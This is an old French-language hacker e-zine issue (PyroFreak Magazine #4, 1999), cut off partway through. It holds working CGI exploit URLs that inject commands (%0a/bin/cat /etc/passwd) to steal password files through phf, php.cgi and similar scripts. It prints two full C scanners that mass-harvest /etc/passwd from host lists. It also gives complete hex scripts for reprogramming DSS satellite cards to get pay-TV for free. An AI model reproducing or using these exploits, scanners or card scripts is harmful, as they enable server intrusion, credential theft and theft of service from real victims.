-::- La meilleur religion c'est croire en sois mme!!!

            _____ _____     _     ______  ______ __ ___      _________
           |:      __ _ \  \  \  /     / |        ____ |    /   ___   |
           |      \__ _\ \  \  \/ ;   /  |;      /_ _/ |   /   /   /; |
           |   ____ __ ___\  \    :  /   |:  _        /   |   /   / : | 
           |: |              /    , /    |, | \     : \   |  :\__/    |
           |; |          ___/ .    /     |. |  \    ;  \  |  ;       /
           |___\         \________/      |___\  \__ ____\ |_________/
            ____ _ ___ __     ___   ___          ______   __    _______
           |:  _ _      ;\   |   \ \   \        /     ;| |  |  /   .  /
           |  |   \_______\  |:  _\ \_ _\      / /|   :| | ;| /      /
          _|  |___   _____   |; |__  ____     / <_|   ,| |  |/    : /
         |_|,  ___| |;   .\  |   __\ \_:__\  /   _     | |        ;/
           |: |     |:  ` /  | :|____  ____  \  / |;   | |  |\     \
           |; |     |, |\ \  | ;     \ \   ;\ \/  |:   | |: | \    .\
           |___\    |__| \_| |________\ \____\    |____| |___\ \_____\
           
                                                                Crdit: __2

13 Mai 1999


Vous devez lire ceci avant d'aller plus loin:

DISCLAMER (Toujours du cris de rptage)

Pyrofreakmag (et ses membres) tient a avertir les gens qui vont continuer
a  lire le  texte    qui  va  suivre: Qu'ont n'est aucunement responsable 
des actes,  et   meme   des penses qui pourraient etre produites par les 
lecteurs   de  ce  zine par rapport a nos articles . Nous tenons a mettre 
cela   bien  au  clair. Si vous n'etes pas d'accord avec cet affirmation, 
fermez ce texte et effacer le de votre disque  dur  ou  sur  tout  autres
disques. Vous etes le seul responsable de vos actes.


============================================================================
Comment nous rejoindre?:

Voici les moyens de rejoindre Pyrofreakmag et ses membres.

Soit par IRC, sur #phreak.fr ,via le serveur undernet.
Soit par e-mail: 

            pyrofreakmag@hotmail.com  | Pour tous les membres
            neuro@frphreak.com        | Pour rejoindre Neuro
            lordendrix@hotmail.com    | Pour rejoindre Endrix
              darkm0nk@rocketmail.com | Pour rejoindre [G]r4FX
               NuClEaR@nuc99.com      | Pour rejoindre Nuclear
                   bill@microsoft.com | Pour le service des plaintes

Et venez visiter notre site web: 

- http://pyrofreak.cjb.net
- http://bill.gates.suck.trop.des.fallus.a.mon.gout.usuck.com

Plusieurs graphiques que Endrix produit, sont affichs sur le site. Ils sont
updater plusieurs fois par mois. Allez voir ca!!!!!!

Si vous voulez que votre article paraisse dans le #5, envoyez le 
pyrofreakmag@hotmail.com . Ou si vous avez des questions, envoyez les aussi
a pyrofreakmag@hotmail.com .

 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4 
: 
| TABLE DES MATIERES 
'.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __


         TITRE DE L'ARTICLE                NICK DE L'AUTEUR

         1- Introduction                   Neuro et endrix

         2- Remerciement                   endrix

         3- Attaques-CGI                   endrix

         4- DSS SATellite Hacking          CyberRider

         5- Free Internet Connection       CyberRider

         6- mmmm.... Attempt PHF :)) 
            hehe Funny                     endrix

         7- Divertissement gratuit :)      endrix

         8- Systme GSM pour les cel       SlasHerZ

         9- La Theorie Du Phreaking de 
            Cellulaire Analogique          SlasHerZ
            
         10- Pipe bomb  la moi!!!!!       endrix

         11- mIRC 5.3x exploit. encore 
             efficace :)                   CyberRider

         12- Beige Boxing                  endrix

         13- Hacking sur les ordis de 
             l'cole                       CyberRider

         14- Conclusion                    PyroPhreak Crew


Extras =   - Porte Bouteille  la Pyro-Phreakers par CyberRider (13ko)
           - ScreenLock par endrix (20ko)
           - Plusieurs Images fait par endrix pour le Crew


 Venir par endrix : - Initiation au Basic
                     - Initiation au Phreaking
                     - Initiation  l'assembleur dos


================================================= Spcial !!!!

J'aimerais bien dire a tout le monde, en lisant, de prendre quelques secondes pour
penser  un de mes chums qui est mort il y a 2 jours avant d'avoir crit ceci. Il est
mort d'une overdose....

rest in peace J-s :)

- endrix
================================================= Spcial !!!!



 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| Intro
'.________ __ __ ___________ ____ ______________Par Neuro et Endrix __


-Neuro-

Vous avez, ou allez peut-tre remarquer que notre zine est mieux orthographi...et 
oui, on a de l'aide. Maniak est venu a notre rescousse. Aller visiter son site Web, 
qui est tres bon d'ailleurs http://www.maniak.net .

PS: Toi le petit con assis devant ton ordinateur en train d'examiner ce zine pour
    trouver le plus de dfauts possibles, personnelement, je t'emmerde. Dis toi
    que ce n'est pas une obligation d'crire un zine sur l'Underground, mais 
    bien un loisir comme un autre et une maniere d'apprendre que j'aime bien.
    Si tu n'es pas content de ce que tu lis, vient pas me faire chier avec
    ca! 


-Endrix-

-=-=-=-=-=-=-=-=-=-=-=-
-Remerciments spciaux-
-=-=-=-=-=-=-=-=-=-=-=-

 date, tout au long de notre existence, nous avons reus de l'aide
mais  nous  n'avons jamais pris le temps de remercier les personnes 
responsablent   pour  l'amlioration   de  ce  e-zine qui est rendu
assez populaire, 800  lecteurs en quelques jours est assez bon pour
nous. Les personnes que j'aimerais remercier   sont les lecteurs ;)
Et oui... Depuis HAQCH, nous commencons  recevoir  de plus en plus
de suggestions, de compliments, de commentaires pour nous amliorer
Merci en particulier SnowCrash de m'avoir remont le moral un peu ;)
Mais, de plus en plus de personnes  nous  aides  pour  monter ce que
nous sommes  en  ce  moment. Plusieurs  vont  dire, "c'est pas grand
chose encore Pyro-Phreakers" ou "boffff... j'ai vu mieux..". Je sais
nous sommes pas encore au "top", mais je suis sr que partis comme nous 
sommes en ce moment, c'est sur que nos zines ne vont que s'amliorer et 
j'espre  un  jour    tre   plus  populaire  que  nous  le  sommes.

Et merci encore tout le monde pour votre soutient ;)


 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| Attaques-CGI 
'.________ __ __ ___________ ____ _______________ __ ___Par Endrix__ __


La plupart des hacks d'aujourd'hui sont fait  partir des "bugs" des
serveurs et/ou une mal configuration du systme. C'est donc pourquoi
j'ai dcid d'crire un article sur quelques unes de ces attaques, 
mais bien sur, les Crews de scurit comme, rhino9, Technotronics...
En savent que personne connait. Les attaques que je vais montrer, pour
quelques unes, sont trs connues mais pour d'autres un peu moins......
Ce sont des attaques en exploitant le CGI (Common Gateway Interface)
d'un serveur Unix/NT. C'est trs simple a raliser mais moins simple de le trouver.

P.S.  la fin de cet article, vous trouverez 2 sources .c pour scanner
le PHP et PHF


_ ________ _
: Test-cgi :
  

Remerciement pour cet article : putois pour m'avoir montrer plus de 
 truc avec ce petit bug.


Test-cgi : Le test cgi est un script habituellement fait en Perl mais 
   souvent aussi fait en C. Avec cette commande, il est possible 
           de voir le directory listing(dir, ls) d'un repertoire root sur 
           un serveur. Pour Faire ce qui suit, je vous conseille de vous 
           installer Netscape 3 parce que plus que 3, il y a un patch qui 
           empche d'exploiter le test- cgi. 

Normalement, le test.cgi est situ dans le rpertoire suivant :

Http://www.serveur.com/cgi-bin/test-cgi/test.cgi

Donc pour exploiter cette commande sur un serveur X il faut faire ca :

URL : Http://www.serveur.com/cgi-bin/test-cgi /* (2 espaces)

Ce qui va vous donner ceci :

================================================

CGI/1.0 test script report :

argc is 1. argv is /\*. 

SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = www.serveur.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
SERVER_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = Ici, seront lister tout les rpertoires
               
REMOTE_HOST = www.serveur.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
================================================

Pour se promener dans les rpertoires, il ne s'agit que d'ajouter le /*rp*/
aprs le /*


Ou, encore faire ceci : 

URL : Http://www.serveur.com/cgi-bin/test-cgi * (avec 2 espaces)

================================================ 
SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = www.serveur.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
SERVER_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = Ici, viendront tout les files
               
REMOTE_HOST = www.serveur.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH = 
================================================


Alors comme vous pouvez voir, il est possible d'obtenir plusieurs 
informations sur une machine sans avoir  entrer dedans ;) Je sais pas 
encore si c'est illgal de faire ca.. Si vous le savez, svp, 
j'aimerais avoir un petit mot avec vous. lordendrix@hotmail.com


_ ______ _
: Le PHF :
  

Le PHF est un bug que presque tous les ordinateurs ont rgls mais, il 
en reste encore quelques uns qui sont vulnrables  cette attaque. Le CGI 
est normalement plac dans www.serveur.com/cgi-bin/phf.cgi. Voici quelques 
facons trs simple d'exploiter ce Bug :

http://www.serveur.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Permet d'obtenir le fichier Password
ex : root:zJpdfS/4Ujkfo:0:0:root:/root:/bin/bash

- 

Mais en plus de pouvoir prendre le etc/passwd, vous pouvez avoir accs
aux autres fichiers et mme les excuter sur le serveur sans avoir  tre devant.

http://www.serveur.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20/

Ceci permet de voir le dir listing et pouvoir excuter des programmes surla machine

-

Ceci est pour avoir un accs COMPLET  la machine... /root ;)

http://www.serveur.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin

- 

Aprs avoir eu le root, vous pouvez mme voir les permitions des fichiers et rpertoires !!!

http://www.serveur.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin

- 

Autres CGI bugs pour obtenir le fichier etc/passwd :


PHP : Http://www.serveur.com/cgi-bin/php.cgi?/etc/passwd

View-Source : http://www.serveur.com/cgi-bin/view-source?../../../../../../../etc/passwd

Campas : Http://www.serveur.com/cgi-bin/campas?%0a/bin/cat%0a/etc/passwd

HTMLScript : Http://www.serveur.com/cgi-bin/htmlscript?../../../../etc/passwd

FrontPage : Http://www.serveur.com/_vti_pvt/service.pwd
Http://www.serveur.com/~someuser/cool-logs/mlog.html?screen=[Le chemin parfait de n'importe quel fichier sur le serveur] 

Irix-Wrap : Http://sgi.serveur.com/cgi-bin/wrap?/../../../../../etc

PfDisplay : http://www.serveur.com/cgi-bin/pfdispaly.cgi?/../../../../etc/passwd

FaxSurvey : http://www.serveur.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd


Conclusion :

Bon, alors j'espre que vous avez bien aim ca et... faites pas de conneries ;)))



PHF Scanner


==========================================================================================
==========================================================================================
/* 
phfscan.c
June, 1996
By Alhambra
alhambra@infonexus.com

A production of The Guild Corporation, 1996

A quick hack to make scanning for hosts which still have the phf bug.
Accepts hosts to scan from stdin, and writes whatever it gets back to
stdout. Plenty of room for optimization, and features that could be 
added include forking off multiple copies for concurrent scans, etc, etc.
Do it yourself...that's how you learn.

The effectiveness of this program for getting password files isn't
what it once was...we see only around a 30% success ratio at getting
/etc/passwd from hosts that would have been vulnerable once upon a time.
But that's still something...

Use:
phfscan < infile > outfile

*/
#include <sys/stat.h>
#include <sys/types.h>
#include <termios.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/syslog.h>
#include <sys/param.h>
#include <sys/times.h>
#ifdef LINUX
#include <sys/time.h>
#endif
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/signal.h>
#include <arpa/inet.h>
#include <netdb.h>
int FLAG = 1;
int Call(int signo)
{
FLAG = 0;
}

main (int argc, char *argv[])
{
char host[100], buffer[1024], hosta[1024],FileBuf[8097];
int outsocket, serv_len, len,X,c,outfd;
struct hostent *nametocheck;
struct sockaddr_in serv_addr;
struct in_addr outgoing;

char PHFMessage[]="GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd\n";
/* yp version...use as needed...*/
/* char PHFMessage[]="GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ypcat%20passwd\n";*/

while(fgets(hosta,100,stdin))
{
if(hosta[0] == '\0')
break;
hosta[strlen(hosta) -1] = '\0';
write(1,hosta,strlen(hosta)*sizeof(char));
write(1,"\n",sizeof(char));
outsocket = socket (AF_INET, SOCK_STREAM, 0);
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family = AF_INET;

nametocheck = gethostbyname (hosta);

/* Ugly stuff to get host name into inet_ntoa form */
(void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0],
sizeof (outgoing.s_addr));
strcpy (host, inet_ntoa (outgoing));
serv_addr.sin_addr.s_addr = inet_addr (host);
serv_addr.sin_port = htons (80);
signal(SIGALRM,Call);
FLAG = 1;

alarm(10); 

X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
alarm(0);

if(FLAG == 1 && X==0){
write(outsocket,PHFMessage,strlen(PHFMessage)*sizeof(char));
while((X=read(outsocket,FileBuf,8096))!=0)
write(1,FileBuf,X);
}
close (outsocket); 
}
return 0;
}
==========================================================================================
==========================================================================================


PHP Scanner


==========================================================================================
==========================================================================================
/*

phpscan.c : php.cgi vunerable server scanning program.

Basically a phf scanner, by Alhambra of
The Guild Corperation, optimise as you wish..

Modifed by so1o@insecurity.org of CodeZero.

Usage:
phpscan < infile > outfile

*/

#include <sys/stat.h>
#include <sys/types.h>
#include <termios.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/syslog.h>
#include <sys/param.h>
#include <sys/times.h>
#ifdef LINUX
#include <sys/time.h>
#endif
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/signal.h>
#include <arpa/inet.h>
#include <netdb.h>
int FLAG = 1;
int Call(int signo)
{
FLAG = 0;
}

main (int argc, char *argv[])
{
char host[100], buffer[1024], hosta[1024],FileBuf[8097];
int outsocket, serv_len, len,X,c,outfd;
struct hostent *nametocheck;
struct sockaddr_in serv_addr;
struct in_addr outgoing;

char PHPMessage[]="GET cgi-bin/php.cgi?/etc/passwd\n";

while(fgets(hosta,100,stdin))
{
if(hosta[0] == '\0')
break;
hosta[strlen(hosta) -1] = '\0';
write(1,hosta,strlen(hosta)*sizeof(char));
write(1,"\n",sizeof(char));
outsocket = socket (AF_INET, SOCK_STREAM, 0);
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family = AF_INET;

nametocheck = gethostbyname (hosta);

(void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0],sizeof (outgoing.s_addr));
strcpy (host, inet_ntoa (outgoing));
serv_addr.sin_addr.s_addr = inet_addr (host);
serv_addr.sin_port = htons (80);
signal(SIGALRM,Call);
FLAG = 1;

alarm(10); 

X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
alarm(0);

if(FLAG == 1 && X==0){
write(outsocket,PHPMessage,strlen(PHPMessage)*sizeof(char));
while((X=read(outsocket,FileBuf,8096))!=0) write(1,FileBuf,X);
}
close (outsocket); 
}
return 0;
}
==========================================================================================
==========================================================================================



 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| DSS SATellite Hacking 
'.________ __ __ ___________ ____ __________ __ ___Par CyberRider__ __



(0)oO0)oO))oO)OO))oO) DSS SATellite Hacking by CyberRider (o)oO0O0(0oO0O0o)


Bon bon bon parler de vrai chose lol!! bon ok Dans cet article ma parler 
du sat hacking plus principalement du sat hacking de la DSS non ce n'est pas 
dish c'est dss et non c'est pas starchoice ou expressvu c'est americain! ok bon 
pourquoi un sat americain? Bin parce que c'est ca qui est ca!!

Ok le Sat hacking n'est pas tres tres rpandu au quebec est pas tres tres pratiqu 
un peu partout!! Dans le fond jai decider decrire la dessus parce que c'est pas full 
connu pis on en parle pas dans la moiti des zines fake st'un bon sujet a faire quand 
ta rien a ecrire.

Bon pourquoi jai choisi le dss americain? Car le prochain coup ca sera la dish et 
ensuite on verra.. pis pourquoi moi le cave je choisi un sat americain ?!!! Car ya 
pas de hack pour les canadiens comme expressvu et starchoice... Tu parles dune marde 
meme po hackable!! Pis en plus la qualite analogique est tres poche. 
On a mis une echostar  ct d'une expressvu et  cot d'une dss.. qui remporte la 
meilleur qualite? DSS bien sur! Alors s'pour ca je parle de ca bon!! Meme chose pour 
starchoice c'est de la marde!!! O,k alors bon, vu que vous etes ecoeurer de mon osti 
de placotage pas de but, j'vais commencer mon tutorial!! 

ok go

Bon, premierement as tu ton programmeur de carte ? Il ten faut un mon ti 
gars fake tu va t'en chercher un a quelque part sur le net ou tu le prend dans le zip 
qui est dans s'te zip la nomm dss.zip kewl?? ok c'est kewl!! Ensuite tu te prend une 
bonne bire froide car ca va peut-tre etre necessaire faut bien se refroidir les 
neuronnes. Refroidir ca veut pas dire de fumer un bat non plus la ts!! bon ok that's kewl??? 

ok aussi il te faut une carte p2 H serie de dss sinon tu peut bien 
sure rien faire avec cette merde!! ok si tu as une F card hmmm desol, try again later. 
Les f card c'est depass tu peux juste ecouter les postes de musique avec ca alors... 
hmmm fouille sur le net pour un programme nomm tornado32. De toute facon avec ces infos, 
ta carte va tre full ca c'est sure !! Aussi, il vous faut des progs pour shooter les 
infos sur la carte. Moi le best des best que je vous suggere est 
Winexplorer, ils sont rendus  la version 3.5.! Pour le dnicher tu vas sur www.dr7.com 
<http://www.dr7.com/> 

Dans dss tool il va y avoir dautre tool mais winexplorer = the best !

Bon, vu que je possde winexplorer mon article sera donc expliqu en fonction de Winexplorer.

Bon pour commencer on va effacer tout ce qui il y avait sur la carte en envoyant ceci :

48 3E 00 00 00
R01

Pour shooter quelque chose vous le mettez dans un txt que vous nommez par, exemple pour 
celui-ci; clean.xpl et vous faites "fichier" dans winexplorer et vous loadez le script 
que vous avez enregistrer ou vous copier/coller seulement les infos dans la 2ieme box en 
haut!

ok aprs avoir shooter un clean, se qui efface toute la carte... Nous allons mettre 26 
updates dans la carte

En envoyant tout ceci a la carte ne fait surtout aucune erreur en le copiant!!!


;--------------- a partir d'ici
8 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 01 85 14 4E 44 52 20 BB 00 0C CE 15 4A 31 DE
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 02 85 14 4E 44 52 20 BB 00 0C 0D 60 C6 48 17
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 03 85 14 4E 44 52 20 BB 00 0C BF 9E CC 38 C6
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 04 85 14 4E 44 52 20 BB 00 0C 8F AC 44 62 E3
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 05 85 14 4E 44 52 20 BB 00 0C 35 53 AB 70 BD
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 06 85 14 4E 44 52 20 BB 00 0C 94 C2 28 ED 4A
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 07 85 14 4E 44 52 20 BB 00 0C 4C 1B 19 69 3F
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 08 85 14 4E 44 52 20 BB 00 0C 28 7C EC E5 84
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 09 85 14 4E 44 52 20 BB 00 0C CD 3A 29 74 E4
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 0A 85 14 4E 44 52 20 BB 00 0C 2C 9F F6 35 43
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 0B 85 14 4E 44 52 20 BB 00 0C 70 DC 0C 2B C6
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 0C 85 14 4E 44 52 20 BB 00 0C 9C 16 FF E3 9B
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 0D 85 14 4E 44 52 20 BB 00 0C A8 40 CB 88 8A
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 0E 85 14 4E 44 52 20 BB 00 0C 1A 41 D7 1B C5
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 0F 85 14 4E 44 52 20 BB 00 0C 7F 69 C4 88 84
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 10 85 14 4E 44 52 20 BB 00 0C C9 1F B4 00 A9
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 11 85 14 4E 44 52 20 BB 00 0C B6 D4 13 81 11
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 12 85 14 4E 44 52 20 BB 00 0C 00 CE 7F C3 6E
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 13 85 14 4E 44 52 20 BB 00 0C EA 5E C7 39 4E
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 14 85 14 4E 44 52 20 BB 00 0C 2F E8 CD 21 03
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 15 85 14 4E 44 52 20 BB 00 0C DD 32 80 54 C6
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 16 85 14 4E 44 52 20 BB 00 0C CD 40 0F F1 52
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 17 85 14 4E 44 52 20 BB 00 0C 87 91 07 EC 60
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 18 85 14 4E 44 52 20 BB 00 0C be fe fd 52 d0
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 19 85 14 4E 44 52 20 BB 00 0C 53 85 fe a9 73
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 1a 85 14 4E 44 52 20 BB 00 0C 28 ff 63 3b 5e
r02
;------------ jusqu'ici

Ok je n'ai pas ecrit de commentaires sur les lignes du fichier tout simplement 
parce que c'est simple comment il marche !! Comme vous voyez, il ya 26 grande 
ligne differente ce qui veut dire que si vous etes logique : Chaque ligne = 1 
update precis 1 ligne = le premier update et la derniere la 26ime update ainsi de 
suite. Maintenant votre carte est suppose tre a 26 update! Alors quand ca a fini 
de shooter le file dans la boite du log c'est supposer tre crit quelque chose 
comme la (26) Entk, quelque chose qui y ressemble sinon si elle n'a meme pas changer 
apres le clean... the card got looped ;( 

Elle n'est plus vraiment utilisable. il ya des truc mais la c'est des gros secret et 
ca prend une autre machine qu'un proggramer de carte. Dsoler c'est pas de ma faute !!
ok jusqu'ici tout va bien!!

Bon, on va continuer  shooter des choses sur notre carte!! avant de continuer on va 
ouvrir le hole 09 de la carte pour pouvoir programmer Bon on shoot a sur la carte!!

;-------- d'ici
48 42 00 00 1D
R01
09 1A 00 00 30 60 C9 0D 00 01 00 00 00 09 24 09
24 09 24 22 22 BB 00 0C 02 9C 62 95 FA
R02

48 42 00 00 1D
R01
09 1A 00 00 30 60 C9 0D 00 01 80 00 00 09 24 09
24 09 24 22 22 BB 00 0C 16 FC 5B 73 BF
R02

48 42 00 00 1C
R01
09 1A 00 00 30 60 D2 02 AC 00 C0 08 00 1B 85 14
01 8F 2F FF BB 00 0C D0 24 2F 61 D7
R02

48 42 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 1C 88 5E 00 00 00 00
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 1D 88 62 00 00 00 00
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 1E 88 66 00 00 00 00
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
;------ a ici

Ok bon maintenant, le hole 09 est ouvert nous pouvons shooter dautre sorte de 
fichiers sur la carte c cool non?? Oui c cool lol! ok bon ensuite nous allons 
effacer la carte de toute trace de ppv !C'est quoi ca? Bin cliss des pay per view!! 
On efface le prog qui permet d'acheter des pay per view car le programme que nous 
allons mettre va en donner ;) ok?? Bon nous allons maintenant faire le lavage de pay 
per view go!!!


;------`d ici
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 1F 80 28 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 20 80 30 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 21 80 38 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 22 80 40 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 23 80 48 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 24 80 50 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 25 80 58 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 26 80 60 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 27 80 68 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 28 80 70 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 29 80 78 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 2A 80 80 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 2B 80 88 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 2C 80 90 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 2D 80 98 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 2E 80 A0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 2F 80 A8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 30 80 B0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 31 80 B8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 32 80 C0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 33 80 C8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 34 80 D0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 35 80 D8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 36 80 E0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 37 80 E8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
; a ici--------------


ok comme vous voyez il y a 25 lignes doubles!!! C'est parce que il y a seulement 
25 dump de pay per view!! Pas 25 postes et 25 dump, anyway entk on s'en cliss nous, 
on le shoot c'est tout! bon maintenant la carte est compltement vide on en est sure. 
Bon, maintenant nous allons envoyer un fichier da'ctivation que jaime beaucoup c'est 
normal y'ai conu par moi ;)) Il expire en avril 2005 donc vous allez avoir beaucoup 
de plaisir  ecouter la tv ;)) pis c'est a, mais ca ne vous donne que 650$ de location 
de tv et 650 de ussb bon c'est quand meme beaucoup la mais j'explique a la fin comment 
effacer nos "past purchase" ;) ok pour mon fichier d'activation meme si on a shooter 50 
choses sur notre carte on va la cleaner!

48 3E 00 00 00
R01

ensuite on est pret a shooter notre beau fichier d'activation.
Hmmm, merci cyber!!!

;------dici 
48 42 00 00 26
R01
09 24 00 00 30 3D 03 E9 19 A6 2B 03 EA 40 1E 55
33 33 37 36 34 20 20 2D 50 1A 31 E4 09 10 00 00
0C 71 3C 6B 7D FF
R02
48 42 00 00 30
r01
09 24 00 00 30 38 09 06 55 33 33 37 36 34 20 20
12 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00
00 00 00 19 A6 40 09 10 00 00 0C 71 3C 6B 7D FF
r02
48 42 00 00 2D
R01
09 24 00 00 30 14 F8 00 26 90 00 14 F9 00 14 FA
